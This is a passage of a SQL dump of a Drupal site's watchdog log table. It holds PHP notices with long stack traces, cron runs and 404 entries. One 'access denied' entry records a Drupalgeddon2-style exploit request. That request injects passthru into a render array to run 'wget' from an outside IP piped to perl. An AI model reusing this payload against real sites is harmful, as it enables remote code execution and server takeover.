Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580257843),(4473,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:59:\"/pt/ms/ms/servicos-clinicos-4700-311-braga/ms-90047454-p-2/\";}',4,'','http://clidentcastelo.pt/pt/ms/ms/servicos-clinicos-4700-311-braga/ms-90047454-p-2/','','54.36.148.251',1580262678),(4474,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:188:\"/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F\";}',4,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285892),(4475,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4476,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:7:\"12.73ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4477,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"29.52ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4478,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:7:\"11.02ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4479,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"98.71ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4480,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"2.27ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4481,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"3.88ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4482,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:5:\"1.5ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4483,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"26.13ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4484,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:4:\"37ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4485,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"59.97ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4486,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?listingId=54183&pageId=129606&txtHWidgetType=S&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Finformacoes-4700-311-braga%252Fms-90047454-p-4%252F','','216.244.66.249',1580285893),(4487,0,'access denied','@uri',_binary 'a:1:{s:4:\"@uri\";s:156:\"/user/register/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=wget+-qO+-+89.40.126.224%2Fbuh%7Cperl&name%5B%23type%5D=markup\";}',4,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580290079),(4488,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11368:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580290080),(4489,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11360:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): 